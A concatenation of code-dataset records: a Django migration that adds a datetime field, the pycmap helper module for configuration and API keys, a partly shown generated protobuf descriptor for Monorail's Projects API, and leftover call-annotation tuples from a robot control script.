'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((448, 4, 448, 54), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((449, 4, 449, 54), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((451, 4, 451, 89), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((452, 4, 452, 90), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((453, 4, 453, 89), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((454, 4, 454, 31), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(454, 15, 454, 30): '"""Real time [s]"""'}, {}), "('Real time [s]')", True, 'import matplotlib.pyplot as plt\n'), ((455, 4, 455, 16), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((500, 4, 500, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((509, 4, 509, 40), 'rospy.init_node', 'rospy.init_node', ({(509, 20, 509, 39): '"""impedance_control"""'}, {}), "('impedance_control')", False, 'import rospy\n'), ((510, 12, 510, 22), 'panda_robot.PandaArm', 'PandaArm', ({}, {}), '()', False, 'from panda_robot import PandaArm\n'), ((512, 11, 512, 35), 'rospy.Rate', 'rospy.Rate', ({(512, 22, 512, 34): 'publish_rate'}, {}), '(publish_rate)', False, 'import rospy\n'), ((521, 10, 521, 22), 'numpy.zeros', 'np.zeros', ({(521, 19, 521, 21): '18'}, {}), '(18)', True, 'import numpy as np\n'), ((522, 16, 522, 40), 'numpy.zeros', 'np.zeros', ({(522, 25, 522, 39): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((525, 16, 525, 40), 'numpy.zeros', 'np.zeros', ({(525, 25, 525, 39): '(3, max_num_it)'}, {}), '((3, max_num_it))', True, 'import numpy as np\n'), ((526, 20, 526, 44), 'numpy.zeros', 'np.zeros', ({(526, 29, 526, 43): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((527, 16, 527, 40), 'numpy.zeros', 'np.zeros', ({(527, 25, 527, 39): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((528, 22, 528, 46), 'numpy.zeros', 'np.zeros', ({(528, 31, 528, 45): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((529, 20, 529, 44), 'numpy.zeros', 'np.zeros', ({(529, 29, 529, 43): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((530, 25, 530, 49), 'numpy.zeros', 'np.zeros', ({(530, 34, 530, 48): '(3, max_num_it)'}, {}), '((3, max_num_it))', True, 'import numpy as np\n'), ((234, 15, 234, 29), 'numpy.zeros', 'np.zeros', ({(234, 24, 234, 28): 'size'}, {}), '(size)', True, 'import numpy as np\n'), ((250, 15, 250, 31), 'numpy.linalg.inv', 'np.linalg.inv', ({(250, 29, 250, 30): 'W'}, {}), '(W)', True, 'import numpy as np\n'), ((290, 15, 290, 45), 'numpy.append', 'np.append', ({(290, 25, 290, 34): 'delta_pos', (290, 35, 290, 44): 'delta_ori'}, {}), '(delta_pos, delta_ori)', True, 'import numpy as np\n'), ((321, 10, 321, 45), 'quaternion.as_float_array', 'quaternion.as_float_array', ({(321, 36, 321, 44): 'rel_quat'}, {}), '(rel_quat)', False, 'import quaternion\n'), ((347, 16, 347, 38), 'numpy.diagflat', 'np.diagflat', ({(347, 28, 347, 37): 'lam[6:12]'}, {}), '(lam[6:12])', True, 'import numpy as np\n'), ((348, 16, 348, 39), 'numpy.diagflat', 'np.diagflat', ({(348, 28, 348, 38): 'lam[12:18]'}, {}), '(lam[12:18])', True, 'import numpy as np\n'), ((405, 43, 405, 64), 'numpy.dot', 'np.dot', ({(405, 50, 405, 57): 'Rot_e.T', (405, 58, 405, 63): 'Rot_d'}, {}), '(Rot_e.T, Rot_d)', True, 'import numpy as np\n'), ((419, 21, 419, 45), 'numpy.dot', 'np.dot', ({(419, 28, 419, 40): 'Rot_e_bigdim', (419, 41, 419, 44): 'h_e'}, {}), '(Rot_e_bigdim, h_e)', True, 'import numpy as np\n'), ((232, 15, 232, 71), 'numpy.subtract', 'np.subtract', ({(232, 27, 232, 47): 'history[:, (iteration)]', (232, 48, 232, 70): 'history[:, (iteration - 1)]'}, {}), '(history[:, (iteration)], history[:, (iteration - 1)])', True, 'import numpy as np\n'), ((341, 59, 341, 77), 'numpy.linalg.inv', 'np.linalg.inv', ({(341, 73, 341, 76): 'K_v'}, {}), '(K_v)', True, 'import numpy as np\n'), ((357, 64, 357, 80), 'numpy.linalg.inv', 'np.linalg.inv', ({(357, 78, 357, 79): 'M'}, {}), '(M)', True, 'import numpy as np\n'), ((384, 25, 384, 39), 'numpy.identity', 'np.identity', ({(384, 37, 384, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((390, 26, 390, 50), 'numpy.dot', 'np.dot', ({(390, 33, 390, 41): 'K_pt_dot', (390, 42, 390, 49): 'p_delta'}, {}), '(K_pt_dot, p_delta)', True, 'import numpy as np\n'), ((391, 26, 391, 51), 'numpy.dot', 'np.dot', ({(391, 33, 391, 42): 'K_pt_ddot', (391, 43, 391, 50): 'p_delta'}, {}), '(K_pt_ddot, p_delta)', True, 'import numpy as np\n'), ((393, 26, 393, 49), 'numpy.dot', 'np.dot', ({(393, 33, 393, 41): 'K_po_dot', (393, 42, 393, 48): 'quat_e'}, {}), '(K_po_dot, quat_e)', True, 'import numpy as np\n'), ((421, 12, 421, 41), 'numpy.dot', 'np.dot', ({(421, 19, 421, 31): 'Rot_e_bigdim', (421, 32, 421, 40): 'x_d_ddot'}, {}), '(Rot_e_bigdim, x_d_ddot)', True, 'import numpy as np\n'), ((422, 12, 422, 40), 'numpy.dot', 'np.dot', ({(422, 19, 422, 31): 'Rot_e_bigdim', (422, 32, 422, 39): 'x_d_dot'}, {}), '(Rot_e_bigdim, x_d_dot)', True, 'import numpy as np\n'), ((341, 33, 341, 53), 'numpy.linalg.inv', 'np.linalg.inv', ({(341, 47, 341, 52): 'gamma'}, {}), '(gamma)', True, 'import numpy as np\n'), ((360, 9, 360, 23), 'numpy.identity', 'np.identity', ({(360, 21, 360, 22): '6'}, {}), '(6)', True, 'import numpy as np\n'), ((375, 29, 375, 44), 'numpy.zeros', 'np.zeros', ({(375, 38, 375, 43): '(3, 3)'}, {}), '((3, 3))', True, 'import numpy as np\n'), ((375, 47, 375, 62), 'numpy.zeros', 'np.zeros', ({(375, 56, 375, 61): '(3, 3)'}, {}), '((3, 3))', True, 'import numpy as np\n'), ((424, 12, 424, 42), 'numpy.dot', 'np.dot', ({(424, 19, 424, 33): 'Rot_e_bigdim.T', (424, 34, 424, 41): 'alpha_e'}, {}), '(Rot_e_bigdim.T, alpha_e)', True, 'import numpy as np\n'), ((425, 128, 425, 143), 'numpy.dot', 'np.dot', ({(425, 135, 425, 138): 'J.T', (425, 139, 425, 142): 'h_e'}, {}), '(J.T, h_e)', True, 'import numpy as np\n'), ((164, 45, 164, 75), 'numpy.sin', 'np.sin', ({(164, 52, 164, 74): '(it * T / 4 * 2 * np.pi + np.pi / 2)'}, {}), '(it * T / 4 * 2 * np.pi + np.pi / 2)', True, 'import numpy as np\n'), ((189, 45, 189, 77), 'numpy.sin', 'np.sin', ({(189, 52, 189, 76): '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)'}, {}), '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)', True, 'import numpy as np\n'), ((214, 45, 214, 77), 'numpy.sin', 'np.sin', ({(214, 52, 214, 76): '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)'}, {}), '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)', True, 'import numpy as np\n'), ((360, 47, 360, 63), 'numpy.linalg.inv', 'np.linalg.inv', ({(360, 61, 360, 62): 'M'}, {}), '(M)', True, 'import numpy as np\n'), ((378, 25, 378, 62), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', ({(378, 45, 378, 61): '[R_d, K_pt, R_d.T]'}, {}), '([R_d, K_pt, R_d.T])', True, 'import numpy as np\n'), ((378, 67, 378, 104), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', ({(378, 87, 378, 103): '[R_e, K_pt, R_e.T]'}, {}), '([R_e, K_pt, R_e.T])', True, 'import numpy as np\n'), ((395, 21, 395, 55), 'numpy.append', 'np.append', ({(395, 31, 395, 42): 'f_delta_t.T', (395, 43, 395, 54): 'm_delta_t.T'}, {}), '(f_delta_t.T, m_delta_t.T)', True, 'import numpy as np\n'), ((395, 72, 395, 101), 'numpy.append', 'np.append', ({(395, 82, 395, 88): 'null.T', (395, 89, 395, 100): 'm_delta_o.T'}, {}), '(null.T, m_delta_o.T)', True, 'import numpy as np\n'), ((423, 29, 423, 45), 'numpy.linalg.inv', 'np.linalg.inv', ({(423, 43, 423, 44): 'M'}, {}), '(M)', True, 'import numpy as np\n'), ((424, 84, 424, 110), 'numpy.dot', 'np.dot', ({(424, 91, 424, 103): 'Rot_e_bigdim', (424, 104, 424, 109): 'x_dot'}, {}), '(Rot_e_bigdim, x_dot)', True, 'import numpy as np\n'), ((287, 25, 287, 55), 'numpy.append', 'np.append', ({(287, 35, 287, 44): 'delta_pos', (287, 45, 287, 54): 'delta_ori'}, {}), '(delta_pos, delta_ori)', True, 'import numpy as np\n'), ((358, 18, 358, 36), 'numpy.dot', 'np.dot', ({(358, 25, 358, 26): 'M', (358, 27, 358, 35): 'x_d_ddot'}, {}), '(M, x_d_ddot)', True, 'import numpy as np\n'), ((361, 29, 361, 40), 'numpy.dot', 'np.dot', ({(361, 36, 361, 37): 'a', (361, 38, 361, 39): 'b'}, {}), '(a, b)', True, 'import numpy as np\n'), ((423, 77, 423, 103), 'numpy.dot', 'np.dot', ({(423, 84, 423, 96): 'Rot_e_bigdim', (423, 97, 423, 102): 'x_dot'}, {}), '(Rot_e_bigdim, x_dot)', True, 'import numpy as np\n')]
intellineers/django-bridger
tests/migrations/0010_modeltest_datetime_field1.py
ed097984a99df7da40a4d01bd00c56e3c6083056
# Generated by Django 2.2.9 on 2020-01-28 14:50 import django.utils.timezone from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("tests", "0009_auto_20200113_1239"), ] operations = [ migrations.AddField( model_name="modeltest", name="datetime_field1", field=models.DateTimeField(default=django.utils.timezone.now), preserve_default=False, ), ]
[((17, 18, 17, 73), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n')]
mdashkezari/pycmap
pycmap/common.py
5b526404d005ec220ab0911cd2f3c05263f9eda3
""" Author: Mohammad Dehghani Ashkezari <[email protected]> Date: 2019-06-28 Function: Host a collection of shared multi-purpose helper functions. """ import os import sys from tqdm import tqdm from colorama import Fore, Back, Style, init import numpy as np import pandas as pd import webbrowser import IPython MAX_ROWS = 2000000 MAX_SAMPLE_SOURCE = 500000 def halt(msg): """Prints an error message and terminates the program.""" msg = '\n' + msg init(convert=True) print(Fore.RED + msg, file=sys.stderr) print(Style.RESET_ALL, end='') sys.exit(1) return def print_tqdm(msg, err=False): """Print helper function compatible with tqdmm progressbar.""" # init() msg = '\n' + msg if err: tqdm.write(Fore.RED + msg) else: tqdm.write(msg) tqdm.write(Style.RESET_ALL, end='') return def get_base_url(): """Returns API root endpoint.""" return os.environ.get( 'CMAP_API_BASE_URL', 'https://simonscmap.com').rstrip('/') def jupytered(): """Returns True if jupyter notebook has invoked the package.""" jup = False import __main__ as main if not hasattr(main, '__file__'): jup = True return jup def inline(): """ Checks if the package results should get prepared for an "inline" context. Currently, just calls the jupytered function. """ return jupytered() def make_filename_by_table_var(table, variable, prefix=''): """Generate a filename (without extention) using table and variable names.""" if prefix != '': prefix += '_' return prefix + variable + '_' + table def canvas_rect(dw, dh): """Resizes a canvas dimensions so that it better fits on client browser.""" ar = dw / dh h = 400 if ar > 3 else 500 w_min = 300 w_max = 1000 w = int(ar * h) if w > w_max: w = w_max if w < w_min: w = w_min return w, h def get_data_limits(data, quant=0.05): """Returns low and high quantile limits of a numeric array.""" data = np.array(data).flatten() return np.nanquantile(data, quant), np.nanquantile(data, 1-quant) # def get_token(token=None): # token = token or os.environ.get('CMAP_API_KEY') # if token in [None, '']: # halt('API Key must be specified to access CMAP API') # return token def config_path(): """Returns the path to the config spreadsheet file.""" return os.path.join(os.path.dirname(os.path.realpath(__file__)), 'config.csv') def initiate_config_file(token, vizEngine, exportDir, exportFormat, figureDir): """Creates a .csv file hosting the primary project configs """ if vizEngine is None: vizEngine = 'plotly' if exportDir is None: exportDir = './export/' if exportFormat is None: exportFormat = '.csv' if figureDir is None: figureDir = './figure/' config = { 'token': [token], 'vizEngine': [vizEngine], 'exportDir': [exportDir], 'exportFormat': [exportFormat], 'figureDir': [figureDir] } pd.DataFrame(config).to_csv(config_path(), index=False) return def remove_angle_brackets(token): """Removes angle brackets at start and end of the token, if exist.""" if token is not None: if token[0] == '<': token = token[1:] if token[-1] == '>': token = token[:-1] return token def save_config(token=None, vizEngine=None, exportDir=None, exportFormat=None, figureDir=None): """Updates the project's configs at the config spreadsheet.""" configPath = config_path() if not os.path.isfile(configPath): initiate_config_file(token, vizEngine, exportDir, exportFormat, figureDir) df = pd.read_csv(configPath) if token is not None: df['token'] = remove_angle_brackets(token) if vizEngine is not None: supportedVizEngines = ['bokeh', 'plotly'] if vizEngine not in supportedVizEngines: halt('%s is not a supported visualization library' % vizEngine) df['vizEngine'] = vizEngine if exportDir is not None: df['exportDir'] = exportDir if exportFormat is not None: df['exportFormat'] = exportFormat if figureDir is not None: df['figureDir'] = figureDir df.to_csv(configPath, index=False) return def load_config(): """Loads the config spreadsheet and returns it as a dataframe.""" configPath = config_path() if not os.path.isfile(configPath): msg = '\nAPI key not found!\n' msg = msg + 'Please pass the API key using the following code:\n' msg = msg + 'import pycmap\n' msg = msg + 'pycmap.API(<api_key>)\n' halt(msg) return pd.read_csv(configPath) def get_token(): """Returns the API key.""" return remove_angle_brackets(load_config()['token'][0]) def get_vizEngine(): """Returns the visualization library name.""" return load_config()['vizEngine'][0] def get_export_dir(): """Returns the path to the export directory.""" return load_config()['exportDir'][0] def get_export_format(): """Returns the file format of the exported files.""" return load_config()['exportFormat'][0] def get_figure_dir(): """Returns the path to the figure directory.""" return load_config()['figureDir'][0] def get_bokeh_tools(): """Returns a list tools used along with a bokeh graph.""" return 'crosshair,pan,zoom_in,wheel_zoom,zoom_out,box_zoom,reset,save' def normalize(vals, min_max=False): """Takes an array and either normalize to min/max, standardize it (remove the mean and divide by standard deviation).""" if min_max: normalized_vals=(vals-np.nanmin(vals))/(np.nanmax(vals)-np.nanmin(vals)) else: normalized_vals=(vals-np.nanmean(vals))/np.nanstd(vals) return normalized_vals def open_HTML(path): """Display HTML file by defaut browser or inline in case jupyter is the caller.""" if jupytered(): vObj = IPython.display.IFrame(path, width=800, height=400) IPython.display.display(vObj) else: path = 'file://' + os.path.realpath(path) webbrowser.open(path, new=2) return
[((24, 8, 24, 26), 'colorama.init', 'init', (), '', False, 'from colorama import Fore, Back, Style, init\n'), ((27, 8, 27, 19), 'sys.exit', 'sys.exit', ({(27, 17, 27, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((38, 8, 38, 43), 'tqdm.tqdm.write', 'tqdm.write', (), '', False, 'from tqdm import tqdm\n'), ((136, 13, 136, 36), 'pandas.read_csv', 'pd.read_csv', ({(136, 25, 136, 35): 'configPath'}, {}), '(configPath)', True, 'import pandas as pd\n'), ((163, 15, 163, 38), 'pandas.read_csv', 'pd.read_csv', ({(163, 27, 163, 37): 'configPath'}, {}), '(configPath)', True, 'import pandas as pd\n'), ((35, 16, 35, 42), 'tqdm.tqdm.write', 'tqdm.write', ({(35, 27, 35, 41): '(Fore.RED + msg)'}, {}), '(Fore.RED + msg)', False, 'from tqdm import tqdm\n'), ((37, 16, 37, 31), 'tqdm.tqdm.write', 'tqdm.write', ({(37, 27, 37, 30): 'msg'}, {}), '(msg)', False, 'from tqdm import tqdm\n'), ((84, 15, 84, 42), 'numpy.nanquantile', 'np.nanquantile', ({(84, 30, 84, 34): 'data', (84, 36, 84, 41): 'quant'}, {}), '(data, quant)', True, 'import numpy as np\n'), ((84, 44, 84, 73), 'numpy.nanquantile', 'np.nanquantile', ({(84, 59, 84, 63): 'data', (84, 65, 84, 72): '(1 - quant)'}, {}), '(data, 1 - quant)', True, 'import numpy as np\n'), ((134, 15, 134, 41), 'os.path.isfile', 'os.path.isfile', ({(134, 30, 134, 40): 'configPath'}, {}), '(configPath)', False, 'import os\n'), ((157, 15, 157, 41), 'os.path.isfile', 'os.path.isfile', ({(157, 30, 157, 40): 'configPath'}, {}), '(configPath)', False, 'import os\n'), ((204, 15, 204, 66), 'IPython.display.IFrame', 'IPython.display.IFrame', (), '', False, 'import IPython\n'), ((205, 8, 205, 37), 'IPython.display.display', 'IPython.display.display', ({(205, 32, 205, 36): 'vObj'}, {}), '(vObj)', False, 'import IPython\n'), ((208, 8, 208, 36), 'webbrowser.open', 'webbrowser.open', (), '', False, 'import webbrowser\n'), ((43, 15, 44, 54), 'os.environ.get', 'os.environ.get', ({(44, 8, 44, 27): '"""CMAP_API_BASE_URL"""', (44, 29, 44, 53): '"""https://simonscmap.com"""'}, {}), "('CMAP_API_BASE_URL', 'https://simonscmap.com')", False, 'import os\n'), ((83, 15, 83, 29), 'numpy.array', 'np.array', ({(83, 24, 83, 28): 'data'}, {}), '(data)', True, 'import numpy as np\n'), ((104, 44, 104, 70), 'os.path.realpath', 'os.path.realpath', ({(104, 61, 104, 69): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((120, 8, 120, 28), 'pandas.DataFrame', 'pd.DataFrame', ({(120, 21, 120, 27): 'config'}, {}), '(config)', True, 'import pandas as pd\n'), ((197, 48, 197, 63), 'numpy.nanstd', 'np.nanstd', ({(197, 58, 197, 62): 'vals'}, {}), '(vals)', True, 'import numpy as np\n'), ((207, 27, 207, 49), 'os.path.realpath', 'os.path.realpath', ({(207, 44, 207, 48): 'path'}, {}), '(path)', False, 'import os\n'), ((195, 30, 195, 45), 'numpy.nanmin', 'np.nanmin', ({(195, 40, 195, 44): 'vals'}, {}), '(vals)', True, 'import numpy as np\n'), ((195, 48, 195, 63), 'numpy.nanmax', 'np.nanmax', ({(195, 58, 195, 62): 'vals'}, {}), '(vals)', True, 'import numpy as np\n'), ((195, 64, 195, 79), 'numpy.nanmin', 'np.nanmin', ({(195, 74, 195, 78): 'vals'}, {}), '(vals)', True, 'import numpy as np\n'), ((197, 30, 197, 46), 'numpy.nanmean', 'np.nanmean', ({(197, 41, 197, 45): 'vals'}, {}), '(vals)', True, 'import numpy as np\n')]
fknittel/git-retry-build
appengine/monorail/api/v3/api_proto/projects_pb2.py
4d57dd6e8b7567daeb24b55f66bc5becd3d459f3
# -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: api/v3/api_proto/projects.proto """Generated protocol buffer code.""" from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2 from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2 from google.api import resource_pb2 as google_dot_api_dot_resource__pb2 from api.v3.api_proto import project_objects_pb2 as api_dot_v3_dot_api__proto_dot_project__objects__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='api/v3/api_proto/projects.proto', package='monorail.v3', syntax='proto3', serialized_options=b'Z!infra/monorailv2/api/v3/api_proto', create_key=_descriptor._internal_create_key, serialized_pb=b'\n\x1f\x61pi/v3/api_proto/projects.proto\x12\x0bmonorail.v3\x1a\x1bgoogle/protobuf/empty.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a&api/v3/api_proto/project_objects.proto\"t\n\x15\x43reateFieldDefRequest\x12-\n\x06parent\x18\x01 \x01(\tB\x1d\xe0\x41\x02\xfa\x41\x17\n\x15\x61pi.crbug.com/Project\x12,\n\x08\x66ielddef\x18\x02 \x01(\x0b\x32\x15.monorail.v3.FieldDefB\x03\xe0\x41\x02\"J\n\x16GetComponentDefRequest\x12\x30\n\x04name\x18\x01 \x01(\tB\"\xfa\x41\x1c\n\x1a\x61pi.crbug.com/ComponentDef\xe0\x41\x02\"\x81\x01\n\x19\x43reateComponentDefRequest\x12-\n\x06parent\x18\x01 \x01(\tB\x1d\xe0\x41\x02\xfa\x41\x17\n\x15\x61pi.crbug.com/Project\x12\x35\n\rcomponent_def\x18\x02 \x01(\x0b\x32\x19.monorail.v3.ComponentDefB\x03\xe0\x41\x02\"M\n\x19\x44\x65leteComponentDefRequest\x12\x30\n\x04name\x18\x01 \x01(\tB\"\xe0\x41\x02\xfa\x41\x1c\n\x1a\x61pi.crbug.com/ComponentDef\"q\n\x19ListIssueTemplatesRequest\x12-\n\x06parent\x18\x01 \x01(\tB\x1d\xfa\x41\x17\n\x15\x61pi.crbug.com/Project\xe0\x41\x02\x12\x11\n\tpage_size\x18\x02 \x01(\x05\x12\x12\n\npage_token\x18\x03 \x01(\t\"d\n\x1aListIssueTemplatesResponse\x12-\n\ttemplates\x18\x01 \x03(\x0b\x32\x1a.monorail.v3.IssueTemplate\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t\"p\n\x18ListComponentDefsRequest\x12-\n\x06parent\x18\x01 \x01(\tB\x1d\xfa\x41\x17\n\x15\x61pi.crbug.com/Project\xe0\x41\x02\x12\x11\n\tpage_size\x18\x02 \x01(\x05\x12\x12\n\npage_token\x18\x03 \x01(\t\"g\n\x19ListComponentDefsResponse\x12\x31\n\x0e\x63omponent_defs\x18\x01 \x03(\x0b\x32\x19.monorail.v3.ComponentDef\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t\"<\n\x13ListProjectsRequest\x12\x11\n\tpage_size\x18\x01 \x01(\x05\x12\x12\n\npage_token\x18\x02 \x01(\t\"W\n\x14ListProjectsResponse\x12&\n\x08projects\x18\x01 \x03(\x0b\x32\x14.monorail.v3.Project\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t2\x87\x05\n\x08Projects\x12M\n\x0e\x43reateFieldDef\x12\".monorail.v3.CreateFieldDefRequest\x1a\x15.monorail.v3.FieldDef\"\x00\x12S\n\x0fGetComponentDef\x12#.monorail.v3.GetComponentDefRequest\x1a\x19.monorail.v3.ComponentDef\"\x00\x12Y\n\x12\x43reateComponentDef\x12&.monorail.v3.CreateComponentDefRequest\x1a\x19.monorail.v3.ComponentDef\"\x00\x12V\n\x12\x44\x65leteComponentDef\x12&.monorail.v3.DeleteComponentDefRequest\x1a\x16.google.protobuf.Empty\"\x00\x12g\n\x12ListIssueTemplates\x12&.monorail.v3.ListIssueTemplatesRequest\x1a\'.monorail.v3.ListIssueTemplatesResponse\"\x00\x12\x64\n\x11ListComponentDefs\x12%.monorail.v3.ListComponentDefsRequest\x1a&.monorail.v3.ListComponentDefsResponse\"\x00\x12U\n\x0cListProjects\x12 .monorail.v3.ListProjectsRequest\x1a!.monorail.v3.ListProjectsResponse\"\x00\x42#Z!infra/monorailv2/api/v3/api_protob\x06proto3' , dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,api_dot_v3_dot_api__proto_dot_project__objects__pb2.DESCRIPTOR,]) _CREATEFIELDDEFREQUEST = _descriptor.Descriptor( name='CreateFieldDefRequest', full_name='monorail.v3.CreateFieldDefRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='parent', full_name='monorail.v3.CreateFieldDefRequest.parent', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002\372A\027\n\025api.crbug.com/Project', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='fielddef', full_name='monorail.v3.CreateFieldDefRequest.fielddef', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=177, serialized_end=293, ) _GETCOMPONENTDEFREQUEST = _descriptor.Descriptor( name='GetComponentDefRequest', full_name='monorail.v3.GetComponentDefRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='name', full_name='monorail.v3.GetComponentDefRequest.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\372A\034\n\032api.crbug.com/ComponentDef\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=295, serialized_end=369, ) _CREATECOMPONENTDEFREQUEST = _descriptor.Descriptor( name='CreateComponentDefRequest', full_name='monorail.v3.CreateComponentDefRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='parent', full_name='monorail.v3.CreateComponentDefRequest.parent', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002\372A\027\n\025api.crbug.com/Project', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='component_def', full_name='monorail.v3.CreateComponentDefRequest.component_def', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=372, serialized_end=501, ) _DELETECOMPONENTDEFREQUEST = _descriptor.Descriptor( name='DeleteComponentDefRequest', full_name='monorail.v3.DeleteComponentDefRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='name', full_name='monorail.v3.DeleteComponentDefRequest.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002\372A\034\n\032api.crbug.com/ComponentDef', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=503, serialized_end=580, ) _LISTISSUETEMPLATESREQUEST = _descriptor.Descriptor( name='ListIssueTemplatesRequest', full_name='monorail.v3.ListIssueTemplatesRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='parent', full_name='monorail.v3.ListIssueTemplatesRequest.parent', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\372A\027\n\025api.crbug.com/Project\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_size', full_name='monorail.v3.ListIssueTemplatesRequest.page_size', index=1, number=2, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_token', full_name='monorail.v3.ListIssueTemplatesRequest.page_token', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=582, serialized_end=695, ) _LISTISSUETEMPLATESRESPONSE = _descriptor.Descriptor( name='ListIssueTemplatesResponse', full_name='monorail.v3.ListIssueTemplatesResponse', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='templates', full_name='monorail.v3.ListIssueTemplatesResponse.templates', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='next_page_token', full_name='monorail.v3.ListIssueTemplatesResponse.next_page_token', index=1, number=2, type=9, cpp_type=9, 